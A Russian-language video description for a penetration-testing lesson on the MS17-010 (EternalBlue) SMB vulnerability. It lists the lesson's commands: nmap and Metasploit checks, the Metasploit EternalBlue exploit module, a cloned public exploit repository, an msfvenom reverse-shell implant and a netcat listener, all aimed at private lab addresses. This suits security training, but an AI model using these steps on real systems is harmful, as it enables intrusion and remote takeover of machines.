MS17-010 (ETERNAL BLUE) Часть 1

Описание к видео MS17-010 (ETERNAL BLUE) Часть 1

С этого видео ролика мы начнем изучение атак на сетевую инфраструктуру. Для начала мы с Вами рассмотрим простые уязвимости со средней глубиной погружения, чтобы в дальнейшем вы сами смогли многие моменты разбирать без труда.
-----------------------------------------------------------------------------------------------------------------------
Приходите в гости:
https://t.me/pro_pentest
https://t.me/fck_harder
-----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
КОМАНДНЫ КОТОРЫЕ Я ИСПОЛЬЗОВАЛ НА УРОКЕ:
-----------------------------------------------------------------------------------------------------------------------
Верификация уязвимости nmap:
nmap -p445 --script smb-vuln-ms17-010 192.168.0.59
Верификация уязвимости msfconsole:
use auxiliary/scanner/smb/smb_ms17_010
cat /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
set CHECK_PIPE true
set RHOSTS 192.168.0.59
exploit
Верификация уязвимости nxc:
nxc smb 192.168.0.59 -M ms17-010
-----------------------------------------------------------------------------------------------------------------------
Автоматизированная эксплуатация:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.59
run
-----------------------------------------------------------------------------------------------------------------------
Загрузка зависимостей для ручной эксплуатации:
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
sudo python2.7 get-pip.py
sudo python2.7 -m pip install distribute
sudo python2.7 -m pip install impacket==0.10.0
git clone https://github.com/worawit/MS17-010.git
cd MS17-010/
python2.7 checker.py 192.168.0.59
Генерирование импланта (reverse shell):
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.0.143 lport=4444 -f exe -o implant.exe
Создать скрин:
screen -S shell
screen -S exploit
Запуск прослушивателя:
nc -nvlp 4444
Выйти из контекста скрина:
Ctrl+A+D
Зайти в ранее созданный скрин по имени:
screen -x shell
Зайти в ранее созданный скрин по ID:
screen -r 5453434
-----------------------------------------------------------------------------------------------------------------------
Дисклеймер
Это обучающее видео создано исключительно в образовательных целях.

Ответственность:

Автор видео не несет ответственности за любые последствия, вызванные неправильным использованием информации, представленной в этом видео.
Видео предназначено для повышения уровня знаний в области информационной безопасности и не поощряет и не поддерживает любую незаконную деятельность.

Образовательные цели:

Видео создано для обучения специалистов по информационной безопасности, студентов и всех, кто интересуется вопросами защиты данных и систем.
Цель видео — помочь зрителям понять принципы работы различных методов защиты и атак для улучшения общей безопасности их систем.
Используйте информацию ответственно и в рамках закона!

Комментарии

Информация по комментариям в разработке